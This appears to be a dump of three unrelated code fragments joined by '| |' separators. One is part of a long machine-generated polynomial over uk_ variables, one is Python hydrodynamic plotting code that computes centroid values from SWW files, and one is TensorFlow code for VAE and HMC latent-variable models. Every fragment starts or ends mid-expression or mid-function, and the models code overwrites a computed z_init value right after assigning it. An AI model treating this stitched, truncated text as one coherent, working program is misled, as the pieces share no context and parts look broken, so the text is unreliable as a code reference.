+ 1649 * uk_27
+ 3689 * uk_28
+ 731 * uk_29
+ 17 * uk_3
+ 1849 * uk_30
+ 1720 * uk_31
+ 4171 * uk_32
+ 9331 * uk_33
+ 1849 * uk_34
+ 1600 * uk_35
+ 3880 * uk_36
+ 8680 * uk_37
+ 1720 * uk_38
+ 9409 * uk_39
+ 43 * uk_4
+ 21049 * uk_40
+ 4171 * uk_41
+ 47089 * uk_42
+ 9331 * uk_43
+ 1849 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 38119212353 * uk_47
+ 96419184187 * uk_48
+ 89692264360 * uk_49
+ 40 * uk_5
+ 217503741073 * uk_50
+ 486580534153 * uk_51
+ 96419184187 * uk_52
+ 187944057 * uk_53
+ 50715063 * uk_54
+ 128279277 * uk_55
+ 119329560 * uk_56
+ 289374183 * uk_57
+ 647362863 * uk_58
+ 128279277 * uk_59
+ 97 * uk_6
+ 13685017 * uk_60
+ 34615043 * uk_61
+ 32200040 * uk_62
+ 78085097 * uk_63
+ 174685217 * uk_64
+ 34615043 * uk_65
+ 87555697 * uk_66
+ 81447160 * uk_67
+ 197509363 * uk_68
+ 441850843 * uk_69
+ 217 * uk_7
+ 87555697 * uk_70
+ 75764800 * uk_71
+ 183729640 * uk_72
+ 411024040 * uk_73
+ 81447160 * uk_74
+ 445544377 * uk_75
+ 996733297 * uk_76
+ 197509363 * uk_77
+ 2229805417 * uk_78
+ 441850843 * uk_79
+ 43 * uk_8
+ 87555697 * uk_80
+ 250047 * uk_81
+ 67473 * uk_82
+ 170667 * uk_83
+ 158760 * uk_84
+ 384993 * uk_85
+ 861273 * uk_86
+ 170667 * uk_87
+ 18207 * uk_88
+ 46053 * uk_89
+ 2242306609 * uk_9
+ 42840 * uk_90
+ 103887 * uk_91
+ 232407 * uk_92
+ 46053 * uk_93
+ 116487 * uk_94
+ 108360 * uk_95
+ 262773 * uk_96
+ 587853 * uk_97
+ 116487 * uk_98
+ 100800 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 249480 * uk_100
+ 546840 * uk_101
+ 42840 * uk_102
+ 617463 * uk_103
+ 1353429 * uk_104
+ 106029 * uk_105
+ 2966607 * uk_106
+ 232407 * uk_107
+ 18207 * uk_108
+ 29791 * uk_109
+ 1467943 * uk_11
+ 16337 * uk_110
+ 38440 * uk_111
+ 95139 * uk_112
+ 208537 * uk_113
+ 16337 * uk_114
+ 8959 * uk_115
+ 21080 * uk_116
+ 52173 * uk_117
+ 114359 * uk_118
+ 8959 * uk_119
+ 805001 * uk_12
+ 49600 * uk_120
+ 122760 * uk_121
+ 269080 * uk_122
+ 21080 * uk_123
+ 303831 * uk_124
+ 665973 * uk_125
+ 52173 * uk_126
+ 1459759 * uk_127
+ 114359 * uk_128
+ 8959 * uk_129
+ 1894120 * uk_13
+ 4913 * uk_130
+ 11560 * uk_131
+ 28611 * uk_132
+ 62713 * uk_133
+ 4913 * uk_134
+ 27200 * uk_135
+ 67320 * uk_136
+ 147560 * uk_137
+ 11560 * uk_138
+ 166617 * uk_139
+ 4687947 * uk_14
+ 365211 * uk_140
+ 28611 * uk_141
+ 800513 * uk_142
+ 62713 * uk_143
+ 4913 * uk_144
+ 64000 * uk_145
+ 158400 * uk_146
+ 347200 * uk_147
+ 27200 * uk_148
+ 392040 * uk_149
+ 10275601 * uk_15
+ 859320 * uk_150
+ 67320 * uk_151
+ 1883560 * uk_152
+ 147560 * uk_153
+ 11560 * uk_154
+ 970299 * uk_155
+ 2126817 * uk_156
+ 166617 * uk_157
+ 4661811 * uk_158
+ 365211 * uk_159
+ 805001 * uk_16
+ 28611 * uk_160
+ 10218313 * uk_161
+ 800513 * uk_162
+ 62713 * uk_163
+ 4913 * uk_164
+ 3969 * uk_17
+ 1953 | |
the output of get_output, OR from a
filename
See _read_output or _get_centroid_values for further explanation of
arguments
e.g.
# Case 1 -- get vertex values first, then centroids
p = plot_utils.get_output('my_sww.sww', minimum_allowed_height=0.01)
pc=util.get_centroids(p, velocity_extrapolation=True)
# Case 2 -- get centroids directly
pc=plot_utils.get_centroids('my_sww.sww', velocity_extrapolation=True)
NOTE: elevation is only stored once in the output, even if it was
stored every timestep.
Lots of existing plotting code assumes elevation is a 1D
array.
But as a hack for the time being the elevation from the file
is available via elev_orig
"""
def __init__(self, p, velocity_extrapolation=False, verbose=False,
timeSlices=None, minimum_allowed_height=1.0e-03):
self.time, self.x, self.y, self.stage, self.xmom,\
self.ymom, self.height, self.elev, self.elev_orig, self.friction, self.xvel,\
self.yvel, self.vel, self.xllcorner, self.yllcorner, self.timeSlices= \
_get_centroid_values(p, velocity_extrapolation,\
timeSlices=copy.copy(timeSlices),\
minimum_allowed_height=minimum_allowed_height,\
verbose=verbose)
def _getCentVar(fid, varkey_c, time_indices, absMax=False, vols = None, space_indices=None):
"""
Convenience function used to get centroid variables from netCDF
file connection fid
"""
if vols is not None:
vols0 = vols[:,0]
vols1 = vols[:,1]
vols2 = vols[:,2]
if((varkey_c in fid.variables)==False):
# It looks like centroid values are not stored
# In this case, compute centroid values from vertex values
assert (vols is not None), "Must specify vols since centroid quantity is not stored"
newkey=varkey_c.replace('_c','')
if time_indices != 'max':
# Relatively efficient treatment is possible
var_cent = fid.variables[newkey]
if (len(var_cent.shape)>1):
# array contain time slices
var_cent = numpy.zeros((len(time_indices), fid.variables[newkey].shape[1]), dtype='float32')
for i in range(len(time_indices)):
var_cent[i,:] = fid.variables[newkey][time_indices[i]]
var_cent = (var_cent[:,vols0]+var_cent[:,vols1]+var_cent[:,vols2])/3.0
else:
var_cent = fid.variables[newkey][:]
var_cent = (var_cent[vols0]+var_cent[vols1]+var_cent[vols2])/3.0
else:
# Requires reading all the data
tmp = fid.variables[newkey][:]
try: # array contain time slices
tmp=(tmp[:,vols0]+tmp[:,vols1]+tmp[:,vols2])/3.0
except:
tmp=(tmp[vols0]+tmp[vols1]+tmp[vols2])/3.0
var_cent=getInds(tmp, timeSlices=time_indices, absMax=absMax)
else:
if time_indices != 'max':
if(len(fid.variables[varkey_c].shape)>1):
var_cent = numpy.zeros((len(time_indices), fid.variables[varkey_c].shape[1]), dtype='float32')
for i in range(len(time_indices)):
var_cent[i,:] = fid.variables[varkey_c][time_indices[i]]
else:
var_cent = fid.variables[varkey_c][:]
else:
var_cent=getInds(fid.variables[varkey_c][:], timeSlices=time_indices, absMax=absMax)
if space_indices is not None:
# Maybe only return particular space indices. Could do this more
# efficiently by only reading those indices initially, if that proves
# important
if (len(var_cent.shape)>1):
var_cent = var_cent[:,space_indices]
else:
var_cent = var_cent[space_indices]
return var_cent
def _get_centroid_values(p, velocity_extrapolation, verbose, timeSlices,
minimum_allowed_height):
"""
Function to get centroid information -- main interface is through
get_centroids.
See get_centroids for usage examples, and read_output or get_output for further relevant info
Input:
p -- EITHER:
The result of e.g. p=util.get_output('mysww.sww').
See the get_output class defined above.
OR:
Alternatively, the name of an sww file
velocity_extrapolation -- If true, and centroid values are not
in the file, then compute centroid velocities from vertex velocities, and
centroid momenta from centroid velocities. If false, and centroid values
are not in the file, then compute centroid momenta from vertex momenta,
and centroid velocities from centroid momenta
timeSlices = list of integer indices when we want output for, or
'all' or 'last' or 'max'. See _read_output
minimum_allowed_height = height at which velocities are zeroed. See _read_output
Output: Values of x, y, Stage, xmom, ymom, elev, xvel, yvel, vel etc at centroids
"""
# Figure out if p is a string (filename) or the output of get_output
pIsFile = isinstance(p, str)
if(pIsFile):
fid=NetCDFFile(p)
else:
fid=NetCDFFile(p.filename)
# UPDATE: 15/06/2014 -- below, we now get all variables directly from the file
# This is more flexible, and allows to get 'max' as well
# However, potentially it could have performance penalities vs the old approach (?)
# Make 3 arrays, each containing one index of a vertex of every triangle.
vols=fid.variables['volumes'][:]
vols0=vols[:,0]
vols1=vols[:,1]
vols2=vols[:,2]
# Get lower-left offset
xllcorner=fid.xllcorner
yllcorner=fid.yllcorner
#@ Get timeSlices
# It will be either a list of integers, or 'max'
l=len(vols)
time=fid.variables['time'][:]
nts=len(time) # number of time slices in the file
if(timeSlices is None):
if(pIsFile):
# Assume all timeSlices
timeSlices=list(range(nts))
else:
timeSlices=copy.copy(p.timeSlices)
else:
# Treat word-based special cases
if(timeSlices == 'all'):
timeSlices=list(range(nts))
if(timeSlices == 'last'):
timeSlices=[nts-1]
#@ Get minimum_allowed_height
if(minimum_allowed_height is None):
if(pIsFile):
minimum_allowed_height=0.
else:
minimum_allowed_height=copy.copy(p.minimum_allowed_height)
# Treat specification of timeSlices
if(timeSlices=='all'):
inds=list(range(len(time)))
elif(timeSlices=='last'):
inds=[len(time)-1]
elif(timeSlices=='max'):
inds='max' #
else:
try:
inds=list(timeSlices)
except:
inds=[timeSlices]
if(inds != 'max'):
time=time[inds]
else:
# We can't really assign a time to 'max', but I guess max(time) is
# technically the right thing -- if not misleading
time=time.max()
# Get coordinates
x=fid.variables['x'][:]
y=fid.variables['y'][:]
x_cent=(x[vols0]+x[vols1]+x[vols2])/3.0
y_cent=(y[vols0]+y[vols1]+y[vols2])/3.0
# Stage and height and elevation
stage_cent = _getCentVar(fid, 'stage_c', time_indices=inds, vols=vols)
elev_cent = _getCentVar(fid, 'elevation_c', time_indices=inds, vols=vols)
# Hack to allow refernece to time varying elevation
elev_cent_orig = elev_cent
if(len(elev_cent.shape)==2):
# Coerce to 1D array, since lots of our code assumes it is
elev_cent=elev_cent[0,:]
# Friction might not be stored at all
try:
friction_cent = _getCentVar(fid, 'friction_c', time_indices=inds, vols=vols)
except:
friction_cent=elev_cent*0.+numpy.nan
# Trick to treat the case where inds == 'max'
inds2 = copy.copy(inds)
if inds == 'max':
inds2 = list(range(len(fid.variables['time'])))
# height
height_cent= stage_cent + 0.
for i in range(stage_cent.shape[0]):
height_cent[i,:] = stage_cent[i,:] - elev_cent
if 'xmomentum_c' in fid.variables:
# The following commented out lines seem to only work on
# some numpy/netcdf versions. So we loop
#xmom_cent = fid.variables['xmomentum_c'][inds2]
#ymom_cent = fid.variables['ymomentum_c'][inds2]
xmom_cent = numpy.zeros((len(inds2), fid.variables['xmomentum_c'].shape[1]), dtype='float32')
ymom_cent = numpy.zeros((len(inds2), fid.variables['ymomentum_c'].shape[1]), dtype='float32')
height_c_tmp = numpy.zeros((len(inds2), fid.variables['stage_c'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_cent[i,:] = fid.variables['xmomentum_c'][inds2[i]]
ymom_cent[i,:] = fid.variables['ymomentum_c'][inds2[i]]
if 'height_c' in fid.variables:
height_c_tmp[i,:] = fid.variables['height_c'][inds2[i]]
else:
height_c_tmp[i,:] = fid.variables['stage_c'][inds2[i]] - elev_cent
# Vel
hInv = 1.0/(height_c_tmp + 1.0e-12)
hWet = (height_c_tmp > minimum_allowed_height)
xvel_cent = xmom_cent*hInv*hWet
yvel_cent = ymom_cent*hInv*hWet
else:
# Get important vertex variables
xmom_v = numpy.zeros((len(inds2), fid.variables['xmomentum'].shape[1]), dtype='float32')
ymom_v = numpy.zeros((len(inds2), fid.variables['ymomentum'].shape[1]), dtype='float32')
stage_v = numpy.zeros((len(inds2), fid.variables['stage'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_v[i,:] = fid.variables['xmomentum'][inds2[i]]
ymom_v[i,:] = fid.variables['ymomentum'][inds2[i]]
stage_v[i,:] = fid.variables['stage'][inds2[i]]
elev_v = fid.variables['elevation']
# Fix elevation + get height at vertices
if (len(elev_v.shape)>1):
elev_v = numpy.zeros(elev_v.shape, dtype='float32')
for i in range(elev_v.shape[0]):
elev_v[i,:] = fid.variables['elevation'][inds2[i]]
height_v = stage_v - elev_v
else:
elev_v = elev_v[:]
height_v = stage_v + 0.
for i in range(stage_v.shape[0]):
height_v[i,:] = stage_v[i,:] - elev_v
# Height at centroids
height_c_tmp = (height_v[:, vols0] + height_v[:,vols1] + height_v[:,vols2])/3.0
# Compute xmom/xvel/ymom/yvel
if velocity_extrapolation:
xvel_v = xmom_v*0.
yvel_v = ymom_v*0.
hInv = 1.0/(height_v+1.0e-12)
hWet = (height_v > minimum_allowed_height)
xvel_v = xmom_v*hInv*hWet
yvel_v = ymom_v*hInv*hWet
# Final xmom/ymom centroid values
xvel_cent = (xvel_v[:, vols0] + xvel_v[:,vols1] + xvel_v[:,vols2])/3.0
xmom_cent = xvel_cent*height_c_tmp
yvel_cent = (yvel_v[:, vols0] + yvel_v[:,vols1] + yvel_v[:,vols2])/3.0
ymom_cent = yvel_cent*height_c_tmp
else:
hInv = 1.0/(height_c_tmp + 1.0e-12)
hWet = (height_c_tmp > minimum_allowed_height)
xmom_v = numpy.zeros((len(inds2), fid.variables['xmomentum'].shape[1]), dtype='float32')
ymom_v = numpy.zeros((len(inds2), fid.variables['ymomentum'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_v[i,:] = fid.variables['xmomentum'][inds2[i]]
ymom_v[i,:] = fid.variables['ymomentum'][inds2[i]]
xmom_cent = (xmom_v[:,vols0] + xmom_v[:,vols1] + xmom_v[:,vols2])/3.0
xvel_cent = xmom_cent*hInv*hWet
ymom_cent = (ymom_v[:,vols0] + ymom_v[:,vols1] + ymom_v[:,vols2])/3.0
yvel_cent = ymom_cent*hInv*hWet
# Velocity
vel_cent = (xvel_cent**2 + yvel_cent**2)**0.5
if inds == 'max':
vel_cent = vel_cent.max(axis=0, keepdims=True)
#vel_cent = getInds(vel_cent, timeSlices=inds)
xmom_cent = getInds(xmom_cent, timeSlices=inds, absMax=True)
ymom_cent = getInds(ymom_cent, timeSlices=inds, absMax=True)
xvel_cent = getInds(xvel_cent, timeSlices=inds, absMax=True)
yvel_cent = getInds(yvel_cent, timeSlices=inds, absMax=True)
fid.close()
return time, x_cent, y_cent, stage_cent, xmom_cent,\
ymom_cent, height_cent, elev_cent, elev_cent_orig, friction_cent,\
xvel_cent, yvel_cent, vel_cent, xllcorner, yllcorner, inds
def animate_1D(time, var, x, ylab=' '):
"""Animate a 2d array with a sequence of 1d plots
Input: time = one-dimensional time vector;
var = array with first dimension = len(time) ;
x = (optional) vector width dimension equal to var.shape[1];
ylab = ylabel for plot
"""
import pylab
import numpy
pylab.close()
pylab.ion()
# Initial plot
vmin=var.min()
vmax=var.max()
line, = pylab.plot( (x.min(), x.max()), (vmin, vmax), 'o')
# Lots of plots
for i in range(len(time)):
line.set_xdata(x)
line.set_ydata(var[i,:])
pylab.draw()
pylab.xlabel('x')
pylab.ylabel(ylab)
pylab.title('time = ' + str(time[i]))
return
def near_transect(p, point1, point2, tol=1.):
# Function to get the indices of points in p less than 'tol' from the line
# joining (x1,y1), and (x2,y2)
# p comes from util.get_output('mysww.sww')
#
# e.g.
# import util
# from matplotlib import pyplot
# p=util.get_output('merewether_1m.sww',0.01)
# p2=util.get_centroids(p,velocity_extrapolation=True)
# #xxx=transect_interpolate.near_transect(p,[95., 85.], [120.,68.],tol=2.)
# xxx=util.near_transect(p,[95., 85.], [120.,68.],tol=2.)
# pyplot.scatter(xxx[1],p.vel[140,xxx[0]],color='red')
x1=point1[0]
y1=point1[1]
x2=point2[0]
y2=point2[1]
# | |
z=None, batch=None: self._prior_posterior(z=z, batch=batch)[:2]
#self._recog = lambda images, z=None: self._prior_posterior(images=images, z=z, encoder=self._encoder)[:2]
pass
else:
if encoder_type == "dense":
self._encoder = DenseEncoder(
"encoder", num_outputs=num_outputs, activation=tf.nn.softplus)
self._decoder = DenseDecoder(
"decoder", output_shape=output_shape, activation=tf.nn.softplus)
elif encoder_type == "conv":
self._encoder = ConvEncoder("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv2":
self._encoder = ConvEncoder2("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder2("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv3":
self._encoder = ConvEncoder3("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder3("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
elif encoder_type == "conv4":
self._encoder = ConvEncoder4("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder4("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
if prior_type == "simple":
self._prior = SimplePrior("prior", num_dims=self._z_dims)
elif prior_type == "simple_3d":
self._prior = Simple3DPrior("prior", shape=conv_z_shape)
if bijector_type == "iaf":
recog = DenseRecognitionIAF(
"recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "rnvp":
recog = DenseRecognitionRNVP(
"recog",
encoder=self._encoder,
condition_bijector=condition_bijector)
elif bijector_type == "shift_scale":
recog = DenseRecognition(
"recog",
encoder=self._encoder)
elif bijector_type == "conv_shift_scale":
recog = ConvShiftScale("recog", encoder=self._encoder)
elif bijector_type == "affine":
recog = DenseRecognitionAffine("recog", encoder=self._encoder, z_dims=z_dims)
elif bijector_type == "affine_lr":
recog = DenseRecognitionAffineLR("recog", encoder=self._encoder, z_dims=z_dims, rank=affine_rank)
elif bijector_type == "conv_iaf":
recog = ConvIAF("recog", encoder=self._encoder, condition_iaf=condition_bijector)
self._recog = recog
if dataset.name == "mnist":
self._noise = DenseMNISTNoise("noise", decoder=self._decoder)
else:
self._noise = DenseCIFAR10TNoise("noise", decoder=self._decoder)
def AdjustedStepSize(self):
if self._step_size_warmup > 0:
global_step = tf.train.get_or_create_global_step()
max_step = self._init_step_size * tf.to_float(
global_step) / self._step_size_warmup
return tf.where(global_step > self._step_size_warmup, self._step_size,
tf.minimum(max_step, self._step_size))
else:
return self._step_size
def RecogVars(self):
return self._encoder.variables + self._recog.variables
def GenVars(self):
return (
self._prior.variables + self._decoder.variables + self._noise.variables)
def MakeDLGM(self,
images,
other_z_init=None,
use_other_z_init=None,
num_samples=64):
z, log_q_z, bijector = self._recog(images)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
post_z = z
q_z = z
if use_other_z_init is not None:
z_init = [tf.cond(use_other_z_init, lambda: tf.identity(other_layer_z),
lambda: tf.identity(layer_z)) for other_layer_z, layer_z in zip(z, other_z_init)]
z_init = z
log_q_z = [tf.reduce_mean(layer_log_q_z) for layer_log_q_z in log_q_z]
log_p_z = [tf.reduce_mean(layer_log_p_z) for layer_log_p_z in log_p_z]
log_p_x_z = tf.reduce_mean(log_p_x_z)
klqp = [layer_log_q_z - layer_log_p_z for layer_log_q_z, layer_log_p_z in zip(log_q_z, log_p_z)]
klqp = [tf.maximum(self._min_kl, layer_klqp) for layer_klqp in klqp]
total_klqp = tf.add_n(klqp)
elbo = log_p_x_z - self._beta * total_klqp
def TargetLogProbFn(*z):
for post_z_e, z_e in zip(post_z, z):
tf.logging.info("Shape here: %s %s", post_z_e.shape, z_e.shape)
z_e.set_shape(post_z_e.shape)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=TargetLogProbFn,
step_size=self.AdjustedStepSize(),
num_leapfrog_steps=self._num_leapfrog_steps)
if self._use_neutra:
kernel = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=kernel, bijector=bijector)
states, kernel_results = tfp.mcmc.sample_chain(
num_results=self._num_hmc_steps, current_state=z, kernel=kernel)
z = [tf.stop_gradient(s[-1, Ellipsis]) for s in states]
post_z = z
_, log_q_z, _ = self._recog(images, z=z)
xentpq = -tf.add_n([tf.reduce_mean(layer_log_q_z) for layer_log_q_z in log_q_z])
if self._use_q_z_for_gen:
z = q_z
recon_means, _ = self._noise(None, z)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
mcmc_log_p = tf.reduce_mean(tf.add_n(log_p_z) + log_p_x_z)
if self._use_neutra:
log_accept_ratio = kernel_results.inner_results.log_accept_ratio
else:
log_accept_ratio = kernel_results.log_accept_ratio
p_accept = tf.reduce_mean(tf.exp(tf.minimum(log_accept_ratio, 0.)))
z, _ = self._prior(batch=num_samples)
sample_means, _ = self._noise(None, z)
return DLGMOutputs(
elbo=elbo,
sample_means=sample_means,
mcmc_log_p=mcmc_log_p,
recon_means=recon_means,
p_accept=p_accept,
post_z=post_z,
post_z_chain=states,
q_z=z_init,
xentpq=xentpq)
def GetPosterior(self, images):
outputs = self.MakeDLGM(images)
return outputs.post_z
def TrainOp(self, data_idx, images):
global_step = tf.train.get_or_create_global_step()
learning_rate = LearningRate(self.train_size, global_step)
if self._save_chain_state:
other_z_init = tf.gather(self._chain_state, data_idx)
use_other_z_init = (
global_step > self._chain_warmup_epochs * self.train_size // TRAIN_BATCH)
else:
other_z_init = None
use_other_z_init = None
outputs = self.MakeDLGM(
images, other_z_init=other_z_init, use_other_z_init=use_other_z_init)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
#gen_opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
utils.LogAndSummarizeMetrics({
"learning_rate": learning_rate,
"elbo": outputs.elbo,
"mcmc_log_p": outputs.mcmc_log_p,
"mcmc_p_accept": outputs.p_accept,
"step_size": self.AdjustedStepSize(),
}, False)
tf.summary.image(
"sample_means", utils.StitchImages(outputs.sample_means))
if self._save_chain_state:
with tf.control_dependencies([outputs.post_z]):
chain_state_update_op = tf.scatter_update(self._chain_state, data_idx,
outputs.post_z)
else:
chain_state_update_op = tf.no_op()
if self._adapt_step_size:
new_step_size = self._step_size + self._step_size_gain * (outputs.p_accept - 0.651)
new_step_size = tf.clip_by_value(new_step_size, 1e-3, 0.5)
step_size_op = self._step_size.assign(
tf.where(global_step > self._step_size_warmup, new_step_size,
self._step_size))
else:
step_size_op = tf.no_op()
with tf.name_scope("recog_train"):
if self._q_loss_type == "klqp":
loss = -outputs.elbo
elif self._q_loss_type == "symm":
loss = (
self._symm_factor * -outputs.elbo +
(1.0 - self._symm_factor) * outputs.xentpq)
elif self._q_loss_type == "klpq":
loss = outputs.xentpq
if self._save_chain_state:
# Not super efficient...
loss = tf.cond(use_other_z_init, lambda: tf.identity(loss),
lambda: tf.identity(-outputs.elbo))
recog_train_op = tf.contrib.training.create_train_op(
loss,
opt,
summarize_gradients=True,
variables_to_train=self.RecogVars(),
transform_grads_fn=utils.ProcessGradients)
with tf.name_scope("gen_train"):
gen_loss = tf.cond(global_step < self._no_gen_train_steps,
lambda: -outputs.elbo, lambda: -outputs.mcmc_log_p)
gen_train_op = tf.contrib.training.create_train_op(
gen_loss,
opt,
None,
summarize_gradients=True,
variables_to_train=self.GenVars(),
transform_grads_fn=utils.ProcessGradients)
return tf.group(recog_train_op, gen_train_op, chain_state_update_op, step_size_op)
def EvalOp(self, data_idx, images):
outputs = self.MakeDLGM(images)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image(
"recon_means", utils.StitchImages(outputs.recon_means[:64]))
return utils.LogAndSummarizeMetrics({
"elbo": outputs.elbo,
"xentpq": outputs.xentpq,
"mcmc_log_p": outputs.mcmc_log_p,
"mcmc_p_accept": outputs.p_accept,
})
def AIS(self, images, num_chains):
def ProposalLogProbFn(*z):
if self._use_q_z_for_ais:
_, log_p_z, _ = self._recog(images, z=z)
else:
_, log_p_z = self._prior(z)
return tf.add_n(log_p_z)
def TargetLogProbFn(*z):
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
images = tf.tile(images, [num_chains, 1, 1, 1])
if self._use_q_z_for_ais:
z_init, _, _ = self._recog(images)
else:
z_init, _ = self._prior(batch=tf.shape(images)[0])
if self._use_bijector_for_ais:
_, _, bijector = self._recog(images)
else:
bijector = None
ais_outputs = utils.AIS(ProposalLogProbFn, TargetLogProbFn, z_init, bijector=bijector)
recons, _ = self._noise(None, ais_outputs.z_fin)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image("recon_means", utils.StitchImages(recons[:64]))
tf.summary.scalar("p_accept", tf.reduce_mean(ais_outputs.p_accept))
return AISOutputs(
log_p=tf.reduce_logsumexp(
tf.reshape(ais_outputs.log_p, [num_chains, -1]) - tf.log(
tf.to_float(num_chains)), 0),
p_accept=ais_outputs.p_accept,
recon=recons,
z_fin=ais_outputs.z_fin)
@gin.configurable("vae")
class VAE(object):
def __init__(self,
z_dims=64,
condition_bijector=False,
bijector_type="iaf",
encoder_type="dense",
beta=1.0,
beta_steps=0,
min_kl=0,
use_q_z_for_ais=False,
dataset=None,
prior_type="simple",
affine_rank=1):
self.train_size = dataset.train_size
if dataset.name == "mnist":
output_shape = [28, 28, 1]
elif dataset.name == "cifar10":
output_shape = [32, 32, 3]
self._z_dims = z_dims
self._beta = beta
self._use_q_z_for_ais = use_q_z_for_ais
if beta_steps > 0:
frac = tf.to_float(
tf.train.get_or_create_global_step()) / tf.to_float(beta_steps)
frac = tf.minimum(frac, 1.0)
self._beta = frac * beta
else:
self._beta = tf.constant(beta)
self._min_kl = tf.to_float(min_kl)
if bijector_type == "affine":
# TriL + shift
num_outputs = (z_dims * (z_dims + 1)) // 2 + z_dims
elif bijector_type == "affine_lr":
num_outputs = z_dims * 2 + z_dims * affine_rank
elif condition_bijector and bijector_type not in ["conv_shift_scale", "shift_scale"]:
num_outputs = 3 * z_dims
else:
num_outputs = 2 * z_dims
if encoder_type == "hier_conv":
assert dataset.name == "cifar10"
self._encoder = ConvHierEncoder("encoder")
self._prior_posterior = ConvHierPriorPost("prior_post")
self._decoder = lambda z: self._prior_posterior(z=z)[2]
self._prior = lambda z=None, batch=None: self._prior_posterior(z=z, batch=batch)[:2]
self._recog = lambda images, z=None: self._prior_posterior(images=images, z=z, encoder=self._encoder)[:2]
else:
if encoder_type == "dense":
self._encoder = DenseEncoder(
"encoder", num_outputs=num_outputs, activation=tf.nn.softplus)
self._decoder = DenseDecoder(
"decoder", output_shape=output_shape, activation=tf.nn.softplus)
elif encoder_type == "conv":
self._encoder = ConvEncoder("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv2":
self._encoder = ConvEncoder2("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder2("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv3":
self._encoder = ConvEncoder3("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder3("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
elif encoder_type == "conv4":
self._encoder = ConvEncoder4("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder4("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
if prior_type == "simple":
self._prior = SimplePrior("prior", num_dims=self._z_dims)
elif prior_type == "simple_3d":
self._prior = Simple3DPrior("prior", shape=conv_z_shape)
if bijector_type == "iaf":
recog = DenseRecognitionIAF(
"recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "rnvp":
recog = DenseRecognitionRNVP(
"recog",
encoder=self._encoder,
condition_bijector=condition_bijector)
elif bijector_type == "shift_scale":
recog = DenseRecognition("recog", encoder=self._encoder)
elif bijector_type == "conv_shift_scale":
recog = ConvShiftScale("recog", encoder=self._encoder)
elif bijector_type == "affine":
recog = DenseRecognitionAffine("recog", encoder=self._encoder, z_dims=z_dims)
elif bijector_type == "conv_iaf":
recog = ConvIAF("recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "affine_lr":
recog = DenseRecognitionAffineLR("recog", encoder=self._encoder, z_dims=z_dims, rank=affine_rank)
# Drop the bijector return.
self._recog = lambda *args, **kwargs: recog(*args, **kwargs)[:2]
if dataset.name == "mnist":
self._noise = DenseMNISTNoise("noise", decoder=self._decoder)
else:
self._noise = DenseCIFAR10TNoise("noise", decoder=self._decoder)
def MakeVAE(self, images, beta_override=None, num_samples=64):
if beta_override is not None:
beta = beta_override
else:
beta = self._beta
return MakeVAE(images, self._recog, self._prior, self._noise, beta,
num_samples, self._min_kl)
def TrainOp(self, data_idx, images):
outputs = self.MakeVAE(images)
global_step = tf.train.get_or_create_global_step()
learning_rate = LearningRate(self.train_size, global_step)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
metrics = {
"learning_rate": learning_rate,
"log_p_x_z": outputs.log_p_x_z,
"elbo": outputs.elbo,
"klqp": outputs.total_klqp,
"beta": self._beta,
}
for i, layer_klqp in enumerate(outputs.klqp):
metrics["klqp_%d"%i] = layer_klqp
utils.LogAndSummarizeMetrics(metrics, False)
tf.summary.image(
"sample_means", utils.StitchImages(outputs.sample_means))
return tf.contrib.training.create_train_op(
-outputs.elbo,
opt,
summarize_gradients=True,
transform_grads_fn=utils.ProcessGradients)
def GetPosterior(self, images):
outputs = self.MakeVAE(images)
return outputs.post_z
def EvalOp(self, data_idx, images):
outputs = self.MakeVAE(images, 1.0)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image(
"recon_means", utils.StitchImages(outputs.recon_means[:64]))
metrics = {
"elbo": outputs.elbo,
"klqp": outputs.total_klqp,
}
for i, layer_klqp in enumerate(outputs.klqp):
metrics["klqp_%d"%i] = layer_klqp
return utils.LogAndSummarizeMetrics(metrics)
def AIS(self, images, num_chains):
outputs = self.MakeVAE(images)
def ProposalLogProbFn(*z):
if self._use_q_z_for_ais:
_, log_p_z = self._recog(images, z=z)
else:
_, log_p_z = self._prior(z)
return tf.add_n(log_p_z)
def TargetLogProbFn(*z):
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
images = tf.tile(images, [num_chains, 1, 1, 1])
if self._use_q_z_for_ais:
z_init, _ = self._recog(images)
else:
z_init, _ | |
#################################################################################
